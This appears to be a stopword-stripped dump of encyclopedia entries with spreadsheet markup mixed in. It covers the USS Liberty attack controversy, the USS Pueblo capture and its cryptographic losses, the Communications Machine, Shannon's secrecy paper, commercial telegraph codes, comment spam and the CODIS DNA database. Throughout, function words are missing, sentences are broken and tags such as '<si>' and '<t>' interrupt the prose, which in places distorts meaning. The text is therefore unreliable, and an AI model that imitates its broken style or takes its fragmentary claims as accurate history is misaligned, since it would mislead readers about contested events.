u.s. government israel jointly stated: "that israeli attack upon liberty result error, nothing more." admiral thomas moorer, member joint chiefs staff time liberty incident, said "cannot accept claim israelis case mistaken identity".the memoranda consists documents: dated june 1967, dated june 1967. june memorandum "account circumstances attack compiled available sources". june memorandum point-by-point analysis israeli inquiry findings fact. concludes: "the attack made malice toward u.s. mistake, failure headquarters attacking aircraft identify liberty subsequent attack torpedo boats incongruous indicative gross negligence."the clark clifford report concluded: "the unprovoked attack liberty constitutes flagrant gross negligence israeli government held completely responsible, israeli military personnel involved punished."the senate foreign relations committee testimony contains, aside hearings concerning foreign authorization bill, questions statements several senators responses secretary defense, robert mcnamara, liberty attack. part, senators dismayed attack, expressed senator bourke hickenlooper: "from read can't tolerate minute [attack] accident." there concern obtaining information attack, expressed committee chairman william fulbright: asked [the attack investigation report] weeks received secretary rusk. time subject." secretary mcnamara promised fast delivery investigation report, "... four hours", concluded remarks saying: simply want emphasize investigative report show evidence conscious intent attack u.s. vessel."the house armed services committee investigation report, "review department defense worldwide communications" investigation focused liberty attack, although contains section describing flow communications connected liberty incident.the national security agency (nsa) history report name denotes, historical report cites u.s. naval court inquiry record, various military government messages memorandum, personal interviews content. report ends section entitled, "unanswered questions", comes conclusion regarding culpability. however, included declassified documents stated: "every official interview numerous liberty crewmen gave consistent evidence indeed liberty flying american flag—and, further, weather conditions ideal ensure easy observance identification."the liberty veterans association, composed veterans ship, states u.s. congressional investigations u.s. investigations actually investigations attack, rather reports using evidence u.s. navy court inquiry, investigations unrelated culpability involved issues communications. view, u.s. navy court inquiry actual investigation incident date. they hastily conducted, days, even though court's president, rear admiral isaac kidd, said would take months conduct properly. inquiry's terms reference limited whether shortcomings part liberty's crew contributed injuries deaths resulted attack.michael oren former israeli ambassador united states) contends "the united states national archives contain evidence suggest information obtained liberty augmented washington's already detailed picture events golan front israel's intentions there." israeli government investigations according israel foreign ministry letter israeli embassy washington: grave situation created, soften result able announce u.s. government already today intend prosecute people disaster. publicize israel already tonight. crucial announcement prosecuting blame publicized repeat, publication american report here. subsequent israeli inquiry reports historical report concluded attack conducted liberty confused egyptian vessel failures communications israel u.s. three israeli reports were: fact finding inquiry colonel ("ram report"—june 1967) preliminary inquiry (hearing) examining judge yeshayahu yerushalmi ("yerushalmi report"—july 1967) (adjudication negligence complaints.) historical report "the liberty incident"—idf history department report (1982)in historical report, acknowledged naval headquarters knew least three hours attack ship electromagnetic audio-surveillance ship u.s. navy" concluded information simply "gotten lost, never passed along ground controllers directed attack crews three israeli torpedo boats".the israeli government said three crucial errors made: refreshing status board (removing ship's classification american, later shift identified), erroneous identification ship egyptian vessel, lack notification returning aircraft informing israeli headquarters markings front hull (markings would found egyptian ship). common root problems, israel blamed combination alarm fatigue experienced israeli forces point pilots severely overworked.after conducting fact-finding inquiry reviewing evidence, judge yerushalmi's decision was: discovered deviation standard reasonable conduct would justify committal anyone trial." words, found negligence member associated attack. ongoing controversy unresolved questions some intelligence military officials dispute israel's explanation. dean rusk, u.s. secretary state time incident, wrote: never satisfied israeli explanation. their sustained attack disable sink liberty precluded assault accident trigger-happy local commander. through diplomatic channels refused accept explanations. believe then, believe day. attack outrageous. retired naval lieutenant commander james ennes, junior officer (and off-going officer deck) liberty's bridge time attack, authored book titled assault liberty describing incident saying, among things, attack deliberate. ennes meadors, also survivor attack, website incident. meadors states classification attack deliberate official policy liberty veterans association, survivors former crew members belong. other survivors several additional websites. citing ennes's book, lenczowski notes: liberty's personnel received firm orders anything anybody attack, naval inquiry conducted earn name "coverup".in 2002, captain ward boston, jagc, u.s. navy, senior counsel court inquiry, said court inquiry's findings intended cover deliberate attack israel ship israelis knew american. 2004, response publication cristol's book liberty incident, boston said "insidious attempt whitewash facts", boston prepared signed affidavit said admiral kidd told government ordered kidd falsely report attack mistake, boston kidd believed attack deliberate. cristol wrote boston's professional qualifications integrity, page book: boston brought special assets addition skill navy lawyer. naval aviator world therefore insight beyond qualified law. also, kidd knew integrity. earlier matter boston willing bump heads kidd boston felt important right thing curry favor senior would write fitness report. cristol said believes boston telling truth kidd's views pressure u.s. government. cristol, also served officer u.s. navy's judge advocate general, suggests boston responsible part original conclusions court inquiry and, later declaring false, boston admitted "lying oath". cristol also notes boston's statements pressure kidd hearsay, kidd alive confirm deny boston maintain, prior affidavit comments related kidd spoke instructions boston others. cristol also provides handwritten 1991 letter admiral kidd that, according cristol, "suggest ward boston either faulty memory vivid imagination". according james ennes, however, admiral kidd urged ennes group keep pressing open congressional probe.the following arguments, found official reports sources, published support hypothesis attack mistaken identity: accidents mistakes occur wartime. journalist ze'ev schiff gave example friendly fire incident israeli aircraft bombed israeli armored column south west bank town jenin attack liberty. also given example similar incident took place suez crisis 1956, israeli aircraft attacked damaged british frigate crane mistaking egyptian warship, time britain israel fighting together. incident took place six-day israel engaged battles arab countries preparing attack third, creating environment mistakes confusion prevalent. example, 11:45, hours attack, large explosion shores el-arish followed black smoke, probably caused destruction ammunition dump retreating egyptian forces. israeli army thought area bombarded, unidentified ship offshore responsible. torpedo boats approached, liberty opened fire them. mcgonagle said felt sure torpedo boat captains believed fire liberty. ensign lucas, testified gave permission firing level machine torpedo boats began firing liberty. later, unmanned, heat nearby fire apparently caused machine rounds explode. admiral shlomo erell, head israeli navy 1967, stated successful argument benefit presented israel purposely attacking american warship, especially considering high cost predictable complications would follow attack powerful ally. also pointed israel notified american embassy immediately attack. several books documentary liberty: dead water argued liberty attacked order prevent u.s. knowing forthcoming attack golan heights, would violate cease-fire israel's government agreed. however, syria accept cease fire june, attack liberty. russian author joseph daichman, book history mossad, states israel justified attacking liberty. israel knew american radio signals intercepted soviet union soviets would certainly inform egypt fact that, moving troops golan heights, israel left egyptian border undefended.lenczowski notes israeli decision "attack destroy" ship "may appear puzzling", explanation seems found liberty's nature task monitor communications sides zone. writes timely knowledge decision invade syria preparatory moves toward "might frustrated israeli designs conquest syria's golan heights" and, sense ennes's accusations, provides plausible thesis israel deliberately decided incapacitate signals-collecting american ship leave alive tell story attack".the u.s. ambassador israel, barbour, reported liberty attack "would surprised" israeli attack syria, intelligence chief told white house aide israel "there still remained syria problem perhaps would necessary give syria blow".the 1981 book weapons russell warren howe says liberty accompanied polaris ballistic missile-armed lafayette-class submarine andrew jackson, filmed entire episode periscope unable provide assistance.james bamford, former news producer, says 2001 book body secrets, israel deliberately attacked liberty prevent discovery described crimes, including killing egyptian prisoners alleges taking place around time nearby town el-arish. however, according camera, claim egyptians executed cast doubt since reporters present town claimed large battle main cause casualties. bamford also stated eyewitness gabi bron claimed people executed israeli troops el-arish. however, gabi bron claimed seen people executed israeli troops.the press release documentary film dead water states recorded evidence suggests attack "daring ploy israel fake egyptian attack" give america reason enter egypt. claimed president lyndon johnson launched allegedly nuclear-armed aircraft targeted cairo u.s. aircraft carrier mediterranean. aircraft recalled time, clear liberty sunk israel carried attack. information source aircraft nuclear-armed, james ennes later stated: clear mistaken aircraft involved, carry nuclear weapons. others tell aircraft launched carried bullpup missiles, might easily mistaken nuclear bombs. learned much later america involved nuclear weapons loading drill time ship learned attack liberty drill factor delayed america's response call help. also possible weapons seen sources. also confusing issue oral history report american embassy cairo, library, notes embassy received urgent message washington warning cairo bombed forces, presumably mistaken retaliation liberty attack. that strange message never explained cancelled. video also reports hearsay covert alliance u.s. israeli intelligence agencies.admiral thomas moorer, former chairman joint chiefs staff critic official united states government version events, chaired non-governmental investigation attack liberty 2003. committee, included former u.s. ambassador saudi arabia james akins, found israel culpable suggested several theories israel's possible motives, including desire blame egypt bring u.s. six-day war.according john loftus mark aarons book, secret against jews, liberty attacked israelis knew ship's mission monitor radio signals israeli troops pass troop movement information egyptians. tapes subsequent developments reported radio intercepts attack made liberty herself, radio intercepts made u.s. submarine amberjack. within hour learning liberty torpedoed, director u.s. national security agency, marshall carter, sent message intercept sites requesting search communications might connected attack reaction communication reported intercepted u.s. navy ec-121 aircraft flew near attacks 2:30 3:27 sinai time (1230 1327 collected voice conversations israeli helicopter pilots control tower hatzor airfield following attack liberty.on july 2003, released co</t>
  </si>
  <si>
    <t>USS Pueblo (AGER-2)</t>
  </si>
  <si>
    <t>pueblo (ager-2) banner-class environmental research ship, attached navy intelligence ship, attacked captured north korean forces january 1968, later known "pueblo incident" alternatively, "pueblo crisis". seizure u.s. navy ship crew members, killed attack, came less week president lyndon johnson's state union address united states congress, week start offensive south vietnam vietnam three days north korea's unit crossed korean demilitarized zone (dmz) killed south koreans attempt attack south korean blue house (executive mansion) capital seoul. taking pueblo abuse torture crew subsequent eleven months became major cold incident, raising tensions western eastern powers. north korea stated pueblo deliberately entered territorial waters nautical miles away island, logbook shows intruded several times. however, united states maintains vessel international waters time incident purported evidence supplied north korea support statements fabricated. pueblo, still held north korea today, officially remains commissioned vessel united states navy. since early 2013, ship moored along pothonggang canal pyongyang used museum ship victorious museum. pueblo ship u.s. navy still commissioned roster currently held captive. initial operations ship launched kewaunee shipbuilding engineering company kewaunee, wisconsin, april 1944, united states army freight passenger (fp) fp-344. army later redesignated vessels freight supply changing designation fs-344. ship, commissioned orleans april 1945, served coast guard–manned army vessel used training civilians army. first commanding officer choate, uscgr, succeeded j.g. marvin barker, uscgr, september 1945. fs-344 placed service 1954. 1964 department defense became interested smaller, less expensive, flexible responsive signals intelligence collection vessels existing agtr t-ag vessels. mothballed light cargo ships suitable existing ships, converted banner 1964 began operations 1965. banner's mission surveil high-frequency electronic emissions line-of-sight propagation requiring operating closer shore previous intelligence gathering missions. banner unarmed, crew issued five m1911 pistols three garand rifles. banner confronted soviet navy ships operating pacific coast soviet union. these ships would sometimes display international signal flags meaning: "heave fire," banner kept steaming scrupulous attention international regulations preventing collisions sea. soviet recognition possible american reciprocity soviet ships similar missions discouraged attacks.fs-344 transferred united states navy april 1966 renamed pueblo (akl-44) pueblo pueblo county, colorado june. initially, classified light cargo ship basic refitting puget sound naval shipyard 1966. pueblo prepared non-secret cover light cargo ship, general crew staffing training basis, never first assigned. installation signals intelligence equipment, cost $1.5 million, delayed 1967 budgetary reasons, resuming service colloquially known "spy ship" redesignated ager-2 1967. limited budget conversion caused disapproval several improvements requested prospective commanding officer, lloyd bucher. requested engine overhaul denied despite banner's experience drifting days unable communicate following failure engines patrol. requested emergency scuttling system denied, bucher subsequently unable obtain explosives demolition charges. replacement burn barrels fuel-fed incinerator allow speedy destruction classified documents denied. after bucher's subsequent request reduce ship's library classified publications similarly denied, able purchase less capable incinerator using discretionary funds intended crew comfort. following liberty incident june, vice chief naval operations (vcno) horacio rivero ordered navy ship would operate without adequate means defending itself. vcno staff directed shipyard install 3-inch/50-caliber pueblo's main deck provisions ammunition storage, bucher successfully argued installation reduced ship stability addition weight main deck. after testing deficiency rework pueblo sailed shipyard september 1967 diego shake-down training.when unarmed pueblo reached u.s. navy base yokosuka, japan, commander united states naval forces japan directed ship take browning caliber machine guns substitute missing deck gun. limited time available training, ship's crew fired five rounds each. bucher opted mount guns exposed positions stern keep possible position bridge. these positions eliminated possible ship's superstructure protect gunners conceal guns ammunition service lockers. exposed guns, nearby ammunition supply, disguised canvas covers became rigid frozen spray. pueblo incident january 1968, pueblo left yokosuka transit u.s. naval base sasebo, japan; left january 1968, headed northward tsushima strait japan. left specific orders intercept conduct surveillance soviet navy activity tsushima strait gather signal electronic intelligence north korea. mission planners failed recognize absence similar north korean missions around united states would free north korea possibility retribution kind restrained soviet response. declassified sigad national security agency (nsa) direct support unit (dsu) naval security group (nsg) pueblo patrol involved incident usn-467y. ager (auxiliary general environmental research) denoted joint naval national security agency (nsa) program. aboard ship's crew five officers enlisted men, officer enlisted nsg, civilian oceanographers provide cover story.on january 1968, pueblo arrived 42°n parallel preparation patrol, transit north korean coast 41°n 39°n, back, without getting closer nautical miles north korean coast, night moving distance nautical miles km). this challenging sailors good navigational experience, captain later reporting, highly professional group seamen navigational chores me."at 17:30 january 1968, north korean modified so-1 class soviet style submarine chaser passed within 4,000 yards (3.7 pueblo, 15.4 nautical miles (28.5 southeast mayang-do position 39°47'n 128°28.5'e.in afternoon january 1968, north korean fishing trawlers rice paddy rice paddy passed within yards pueblo. that day, north korean special operations force unit made assassination attempt blue house executive mansion south korean president park chung-hee, crew pueblo informed.according american account, following day, january, pueblo approached submarine chaser nationality challenged; pueblo responded raising u.s. flag directing civilian oceanographers commence water sampling procedures deck winch. north korean vessel ordered pueblo stand fired upon. pueblo attempted maneuver away, considerably slower submarine chaser. several warning shots fired. additionally, three torpedo boats appeared horizon joined chase subsequent attack.the attackers soon joined korean people's force mig-21 fighters. fourth torpedo boat second submarine chaser appeared horizon short time later. ammunition pueblo stored decks, machine guns wrapped cold-weather tarpaulins. machine guns unmanned, attempt made them. report quotes sailing order: defensive armament (machine guns) stowed covered manner cause unusual interest surveyed units. used event threat survival notes: practice, discovered that, temperamental adjustments firing mechanisms, .50-caliber machine guns took least minutes activate. only crew member, former army experience, ever experience weapons, although members crew received rudimentary instructions weapons immediately prior ship's deployment. u.s. navy authorities crew pueblo insist capture, pueblo miles outside north korean territorial waters. north korea claims vessel well within north korean territory. pueblo's mission statement allowed approach within nautical mile (1,852 limit. however, north korea describes 50-nautical-mile boundary even though international standards nautical miles time.the north korean vessels attempted board pueblo, maneuvered prevent hours. submarine chaser opened fire cannon smaller vessels fired machine guns, injuring signalman leach left calf upper right side. captain bucher, too, received slight shrapnel wounds, incapacitating. crew pueblo began destroying sensitive material. volume material board great impossible destroy all. report quotes lieutenant steve harris, officer charge pueblo's naval security group command detachment: retained board obsolete publications good intentions getting things done time started mission. wanted place organized eventually excessive numbers copies board concludes: only small percentage total classified material aboard ship destroyed. radio contact pueblo naval security group kamiseya, japan ongoing incident. result, seventh fleet command fully aware pueblo's situation. cover promised never arrived. fifth force aircraft strip alert, estimated two-to-three-hour delay launching aircraft. enterprise located nautical miles (940 south pueblo, four f-4b aircraft alert equipped air-to-surface engagement. enterprise's captain estimated hours minutes) required converted aircraft air.eventually shelling forced pueblo stop, signal compliance follow north korean vessels ordered. pueblo stopped immediately outside north korean waters attempt obtain time destroying sensitive material, immediately fired upon submarine chaser, sailor, fireman duane hodges, killed, pueblo resumed following north korean vessels. ship finally boarded 05:55 (2:55 local) torpedo boat submarine chaser. crew members hands tied blindfolded, beaten, prodded bayonets. once pueblo north korean territorial waters, boarded again, time high-ranking north korean officials.the first official confirmation ship north korean hands came five days later, january 1968. days earlier, flight a-12 oxcart aircraft project black shield squadron kadena, okinawa, flown pilot jack weeks, made three high-altitude, high-speed flights north korea. when aircraft's films processed united states, showed pueblo wonsan harbor area surrounded north korean vessels.there dissent among government officials united states regarding nation's response situation. congressman mendel rivers suggested president johnson issue ultimatum return pueblo penalty nuclear attack, senator gale mcgee said united states wait information make "spasmodic response[s] aggravating incidents." according horace busby, special assistant president johnson, president's "reaction hostage taking work hard keep demands retaliation attacks upon north koreans", worried rhetoric might result hostages killed.on wednesday, january 1968, following incident, extensive cabinet meetings washington decided initial response deploy naval forces immediate area. make reconnaissance flights location pueblo. call military reserves extend terms military service. protest incident within framework united nations. have president johnson personally cable soviet premier alexei kosygin.the johnson administration also considered blockade north korean ports, strikes military targets attack across demilitarized zone separating koreas.although american officials time assumed seizure pueblo directed soviet union, declassified soviet archives later showed soviet leadership caught surprise, became fearful possibility korean peninsula. eastern bloc ambassadors actively cautioned north korea exercise caution aftermath incident. several documents suggest aggressive action attempt north korea signal tilt towards chinese communist party aftermath sino-soviet split 1966. aftermath pueblo taken port wonsan crew moved twice prisoner-of-war (pow) camps. crew members reported upon release starved regularly tortured north korean custody. this treatment turned worse north koreans realized crewmen secretly giving "the finger" staged propaganda photos. commander lloyd bucher psychologically tortured, including mock firing squad effort make confess. eventually north koreans threatened execute front him, bucher relented agreed "confess crew's transgression." bucher wrote confession since "confession" definition needed written confessor himself. they verified meaning wrote, failed catch said paean dprk [north korea]. paean great leader sung". (bucher pronounced "paean" "pee on.")negotiations release crew took place panmunjom. time, u.s. officials concerned conciliating south koreans, expressed discontent left negotiations. richard ericson, political counselor american embassy seoul operating officer pueblo negotiations, notes oral history: south koreans absolutely furious suspicious might they anticipated north koreans would exploit situation rok's disadvantage every possible, rapidly growing distrustful losing faith great ally. course, problem ensure would retaliate blue house raid ease growing feelings insecurity. they began realize porous wanted equipment aid. juggling number problems. also noted meetings panmunjom usually unproductive particular negotiating style north koreans: example, would proposal sort release crew would sitting card catalog answer particular proposal presented cards, would something totally unresponsive come back next meeting answer directed question. rarely immediate answer. that happened negotiations. their negotiators obviously never empowered speak basis personal judgment general instructions. they always defer reply presumably went pyongyang passed around decided sometimes would totally nonsensical responses something card file corresponded proposal hand. ericson george newman, deputy chief mission seoul, wrote telegram state department february 1968, predicting negotiations would play out: what said effect this: going thing panmunjom, sole objective crew back, playing north korea's hands negotiations follow clear inevitable path. going asked sign document north koreans drafted. they brook changes. forth point view require confess everything accuse allow take much time feel need squeeze every damn thing situation terms propaganda goals, exploit situation drive wedge u.s. rok. then feel accomplished can, agreed sign document confession apology, return crew. they return ship. this going always been. following apology, written admission u.s. pueblo spying, assurance u.s. would future, north korean government decided release remaining crew members, although written apology preceded oral statement done secure release. december 1968, crew taken buses korean demilitarized zone (dmz) border south korea crossing "bridge return", carrying body fireman duane hodges, killed capture. exactly months taken prisoner, captain long line crewmen, followed executive officer, lieutenant murphy, last across bridge.bucher officers crew subsequently appeared navy court inquiry. court-martial recommended bucher officer charge research department, lieutenant steve harris, surrendering without fight failing destroy classified material, secretary navy john chafee, rejected recommendation, stating, "they suffered enough." commander bucher never found guilty indiscretions continued navy career retirement.in 1970, bucher published autobiographical account pueblo incident entitled bucher: story. bucher died diego january 2004, james kell, former sailor command, suggested injuries bucher suffered time north korea contributed death.along battle sanh offensive, pueblo incident factor turning u.s. public opinion vietnam influencing lyndon johnson withdrawing 1968 presidential election.uss pueblo still held north korea. october 1999, towed wonsan east coast, around korean peninsula, port nampo west coast. this required moving vessel international waters, undertaken visit u.s. presidential envoy james kelly pyongyang. after stop nampo shipyard, pueblo relocated pyongyang moored taedong river near spot general sherman incident believed taken place. late 2012, pueblo moved pothonggang canal pyongyang, next addition fatherland liberation museum.today, pueblo remains second-oldest commissioned ship u.s. navy, behind constitution ("old ironsides"). pueblo american ships captured since first barbary war. breach u.s. communications security reverse engineering communications devices pueblo allowed north koreans share knowledge soviet union replication communications devices. this allowed nations access navy's communication systems navy revised systems. seizure pueblo followed soon navy warrant officer john anthony walker introduced soviet authorities, setting walker ring. argued seizure pueblo executed specifically capture encryption devices aboard. without them, difficult soviets make full walker's information. mitchell lerner jong-dae shin argue soviet-bloc romanian dossiers demonstrate soviets knowledge capture ship taken surprise happened.after debriefing released crew, u.s. prepared "cryptographic damage assessment" declassified late 2006. report concluded that, crew made diligent effort destroy sensitive material, familiar cryptographic equipment publications, received training proper destruction, efforts sufficient prevent north koreans recovering sensitive material. crew thought north koreans would able rebuild much equipment. cryptographic equipment board time capture included "one kl-47 off-line encryption, kw-7s on-line encryption, three kwr-37s receiving navy operational intelligence broadcast, four kg-14s used conjunction kw-37 receiving fleet broadcasts." additional tactical systems one-time pads captured, considered little significance since messages sent using would value short time. ship's cryptographic personnel subject intense interrogation felt highly knowledgeable electronics experts. when crew members attempted withhold details, later confronted pages captured manuals told correct earlier accounts. report concluded information gained interrogations saved north koreans three months effort, would eventually understood everything captured equipment accompanying technical manuals alone. crew members also asked many u.s. cryptographic systems board pueblo, supplied superficial information. pueblo carried lists january, february march 1968, immediately pueblo captured, instructions sent holders keys them, damage limited. however discovered debriefing pueblo onboard superseded lists november december 1967 destroyed january well pueblo arrived station, according standing orders.: report considered capture superseded keys november december damaging cryptographic loss. capture keys likely allowed north korea allies read 117,000 classified messages sent months.: north koreans would also gained thorough knowledge workings captured systems would additional material compromised future. existence walker ring was, course, known time report. report noted "the north koreans display captured cryptographic material crew, except equipment diagrams, otherwise publicize material propaganda purposes. when contrasted international publicity given capture highly classified special intelligence documents, fact material displayed publicized would indicate thoroughly understood significance importance concealing united states details information acquired.": communist camp documents released national archives romania suggest chinese rather soviets actively encouraged reopening hostilities korea 1968, promising north korea vast material support hostilities korea resume. together blue house raid, pueblo incident turned part increasing divergence soviet leadership north korea. fostering resumption hostilities korea, allegedly, seen beijing mend relations north korea china, pull north korea back chinese sphere influence context sino-soviet split. after (then secret) diplomatic efforts soviets american crew released fell deaf ears pyongyang, leonid brezhnev publicly denounced north korea's actions plenary session 23rd congress communist party soviet union. contrast, chinese (state controlled) press published declarations supportive north korea's actions pueblo incident.furthermore, soviet archives reveal soviet leadership particularly displeased north korean leader il-sung contradicted assurances previously gave moscow would avoid military escalation korea. previously secret documents suggest soviets surprised pueblo incident, first learning press. documents reveal north koreans also kept soviets completely dark regarding ongoing negotiations americans crew's release, another bone contention. soviet reluctance reopening hostilities korea partly motivated fact 1961 treaty north korea obliged intervene case latter attacked. brezhnev however made clear 1966 case similar treaty china, soviets prepared ignore rather all-out united states.: 12–15 given chinese north korean archives surrounding incident remain secret, il-sung's intentions cannot known certainty. soviets revealed however il-sung sent letter alexei kosygin january 1968 demanding military economic aid, interpreted soviets price would restrain il-sung's bellicosity. consequently, il-sung invited moscow, refused person owing "increased defense preparations" attend sending instead defense minister, chang-bong, arrived february 1968. during long meeting brezhnev, soviet leader made clear willing united states, agreed increase subsidies north korea, happen subsequent years.: 15–18 timeline negotiations with major general chung-kuk representing north korea (dprk) u.s. navy rear admiral john victor smith representing united states april 1968, point replaced u.s. army major general gilbert woodward. timeline quotations taken matter accountability trevor armbrister. tourist attraction pueblo tourist attraction pyongyang, north korea, since moved taedong river. pueblo used anchored spot believed general sherman incident took place 1866. late november 2012 pueblo moved taedong river dock casement pothong river next fatherland liberation museum. ship renovated made open tourists accompanying video north korean perspective late july 2013. commemorate anniversary korean war, ship layer paint added. visitors allowed board ship secret code room crew artifacts. offer repatriate during august 2005 diplomatic session north korea, former u.s. ambassador south korea donald gregg received verbal indications high-ranking north korean officials state would willing repatriate pueblo united states authorities, condition prominent u.s. government official, secretary state, come pyongyang high level talks. while u.s. government publicly stated several occasions return still commissioned navy vessel priority, indication matter brought u.s. secretary state mike pompeo april 2018 visit. lawsuits former pueblo crew members william thomas massie, dunnie richard tuck, donald raymond mcclarren, lloyd bucher sued north korean government abuse suffered hands captivity. north korea respond suit. december 2008, u.s. district judge henry kennedy, jr., washington, d.c., awarded plaintiffs million damages, describing treatment north korea "extensive shocking." plaintiffs, october 2009, attempting collect judgement north korean assets frozen u.s. government.in february 2021 court awarded survivors families $2.3 billion. uncertain able collect money north korea. awards pueblo earned following awards crew members, receive full recognition involvement incident decades later. 1988, military announced would award prisoner medals captured nation's conflicts. while thousands american prisoners awarded medals, crew members pueblo receive them. instead, classified "detainees". congress passed overturning decision medals awarded; crew finally received medals diego 1990. representation popular culture 1968 star trek episode "the enterprise incident" loosely based upon pueblo incident. episode written fontana, captain kirk takes federation starship enterprise, apparently without authorization, enemy romulan space.the pueblo incident dramatically depicted 1973 theater televised production pueblo. holbrook starred captain lloyd bucher. two-hour drama nominated three emmy awards, winning two.in 2013 archer episode "the honeymooners", sterling archer references incident fighting north korean agents, shouting "and pueblo!". also 1969 ec-121 shootdown incident korean conflict (1966–1969) list museums north koreaother conflicts: gulf tonkin incident hainan island incident mayaguez incident liberty incidentgeneral: technical research ship list hostage crises references sources nkidp: crisis confrontation korean peninsula: 1968–1969, critical oral history pueblo today usspueblo.org further reading external links pueblo incident youtube "the pueblo incident" briefing analysis navy (1968) pueblo youtube youtube video taken aboard pueblo korea short film pueblo incident available free download internet archive. official website former pueblo crew members complaint court judgment crew members' lawsuit north korea "cnn.com obituary commander lloyd bucher". cnn. archived original april 2004. retrieved february 2004.{{cite web}}: maint: bot: original status unknown (link) puebloon google maps satellite image naval vessel register listing pueblo imdb 1973 movie pueblo incident north korean international documentation project movie sold pyongyang pueblo incident youtube north korean video issue navy marine corps report investigation "uss pueblo seizure" conducted pursuant chapter manual judge advocate general (jagman)[1] published files: pueblo court inquiry scrapbook, 1969-1976, held special collection archives, nimitz library united states naval academy "uss pueblo crisis," wilson center digital archive reactions pueblo incident (1968), texas archive moving image</t>
  </si>
  <si>
    <t>Communications Machine</t>
  </si>
  <si>
    <t>communications machine, "cm", mechanical device used united states navy 1920s. used sliding alphabet system. developed agnes meyer driscoll william gresham. 1937 united states congress recognized achievement awarding $15,000. references</t>
  </si>
  <si>
    <t>Communication Theory of Secrecy Systems</t>
  </si>
  <si>
    <t>"communication theory secrecy systems" paper published 1949 claude shannon discussing cryptography viewpoint information theory. foundational treatments (arguably foundational treatment) modern cryptography. also proof theoretically unbreakable ciphers must requirements one-time pad. shannon published earlier version research formerly classified report mathematical theory cryptography, memorandum 45-110-02, sept. 1945, bell laboratories. this report also precedes publication mathematical theory communication", appeared 1948. also confusion diffusion product cipher one-time unicity distance references shannon, claude. "communication theory secrecy systems", bell system technical journal, vol. 28(4), page 656–715, 1949. shannon, claude. mathematical theory cryptography", memorandum 45-110-02, sept. 1945, bell laboratories. notes https://www.itsoc.org/about/shannon external links online retyped copy paper archived 2007-06-05 wayback machine scanned version published bstj paper</t>
  </si>
  <si>
    <t>Commercial code (communications)</t>
  </si>
  <si>
    <t>telecommunication, commercial code code used save cablegram costs. telegraph (and telex) charged word sent, companies sent large volumes telegrams developed codes save money tolls. elaborate commercial codes encoded complete phrases single words developed published codebooks thousands phrases sentences corresponding codewords. commercial codes generally intended keep telegrams private, codes widely published; usually cost-saving measures only. many general-purpose codes, acme code code, published widely used 1870s 1950s, arrival transatlantic telephone calls next-day airmail rendered obsolete. numerous special-purpose codes also developed sold fields varied aviation, dealerships, insurance, cinema, containing words phrases commonly used professions.these codes turned complete phrases single words (commonly five letters). these always genuine words; example, codes contained "words" byoxo ("are trying weasel deal?"), liouy ("why answer question?"), bmuld ("you're skunk!"), ayylu ("not clearly coded, repeat clearly."). history first telegraphic codes developed shortly advent telegraph, spread rapidly: first codebook 1845. 1854, eighth telegrams transmitted york orleans written code. cable tolls charged word, telegraph companies counted codewords like words, carefully constructed code could reduce message lengths enormously. early codes typically compilations phrases corresponding codewords numbering tens thousands. codewords chosen pronounceable words minimize errors telegraphers, telegrams composed non-pronounceable words cost significantly more. regulations international telegraph union evolved time; 1879, mandated coded telegrams contain words german, english, spanish, french, italian, dutch, portuguese, latin, commercial codes already frequently used nonsense words. 1903 regulations changed allow pronounceable word letters long.another telegraph codes reduce risk misunderstanding avoiding similar words mean similar things. codes usually designed avoid error using words could easily confused telegraph operators. telegrapher errors could sometimes cause serious monetary damages, instance resulted united states supreme court case primrose western union telephone company, wool dealer argued error western union telegrapher cost $20,000 misread instructions. supreme court subsequently ruled western union liable cost message, $1.15.examples commercial codes include telegraphic code, bentley's second phrase code, lieber's standard telegraphic code (1896), phillips code (1879 later), slater's telegraphy code (1916), western union universal codebook (1907) unicode (1889). mechanics codes code, code words could contain blanks. example, "freight tonnage requirements" section, antitacte means "mozambique, loading places, ____, steamer ____ tons general cargo ____ capacity cargo". telegrapher would fill three parameters: destination, number tons, price ton. regulations international telegraph convention distinguished "code telegrams", describes "those composed words context intelligible meaning", "cipher telegrams", describes "those containing series groups figures letters secret meaning words found standard dictionary language". cipher telegrams subject higher tolls. codes telegraphic code, therefore, included numbers code words user could choose two. examples example code words: from telegraphic code (5th edition): paromella leaving dock (harbour) struck pier, damaging stern arimaspen phaeton b.h.p. cylinder motor seat four passengers speed miles hour haubarer charterers allow option carrying horses ship's benefit from telegraphic code (6th edition): enbet captain insane from bentley's complete phrase code: oyfin reinsured azkhe clean bill health atgam authorised? from telegraphic cipher code specially adapted cotton trade: dress supply india less expected insane price, free board freight, offer cotton shipment steamer sailing week? puncher anticipate rate interest reduced bank england from unicode (which, unlike others, intended domestic addition commercial; unrelated unicode computing standard): dionysia amputation considered necessary annosus confined yesterday, twins, dead, mother expected live cognosco dining evening, send dress clothes also brevity code australian railway telegraphic codes great western railway telegraphic codes telegraph code telegraphese notes references kahn, david (1967). codebreakers: story secret writing (1st ed.). york: macmillan. godfrey, helen, submarine telegraphy hunt gutta percha, brill, 2018 isbn 9004357289.</t>
  </si>
  <si>
    <t>Comment spam</t>
  </si>
  <si>
    <t>comment spam term referencing broad category spambot spammer postings abuse web-based forms post unsolicited advertisements comments forums, blogs, wikis online guestbooks. related topics include: forum spam, posts internet forums contains related unrelated advertisements, links malicious websites, abusive otherwise unwanted information newsgroup spam, type spam targets usenet newsgroups social spam, unwanted spam content appearing social networks website user-generated content spam blogs, form spamdexing done posting random comments, copied material, promotion commercial services troll (internet), person sows discord internet hit-and-run posting, tactic poster internet forum enters, makes post, disappear immediately sockpuppet (internet), online identity used purposes deception astroturfing, practice masking sponsors message organization also comment (disambiguation) state-sponsored internet sockpuppetry</t>
  </si>
  <si>
    <t>Combined DNA Index System</t>
  </si>
  <si>
    <t>combined index system (codis) united states national database created maintained federal bureau investigation. codis consists three levels information; local index systems (ldis) profiles originate, state index systems (sdis) allows laboratories within states share information, national index system (ndis) allows states compare information another. codis software contains multiple different databases depending type information searched against. examples databases include, missing persons, convicted offenders, forensic samples collected crime scenes. each state, federal system, different laws collection, upload, analysis information contained within database. however, privacy reasons, codis database contain personal identifying information, name associated profile. uploading agency notified hits samples tasked dissemination personal information pursuant laws. establishment creation national database within u.s. first mentioned technical working group analysis methods (twgdam) 1989. 1990, began pilot databasing program state local laboratories. 1994, congress passed identification authorized create national database convicted offenders well separate databases missing persons forensic samples collected crime scenes. also required laboratories participating codis program maintain accreditation independent nonprofit organization actively involved forensic fields scientists processing samples submission codis maintain proficiency routinely tested ensure quality profiles uploaded database. national level codis (ndis) implemented october 1998. today, states, district columbia, federal enforcement, army laboratory, puerto rico participate national sharing profiles. database structure codis database contains several different indexes storage profile information. assistance criminal investigations three indexes exist: offender index, contains 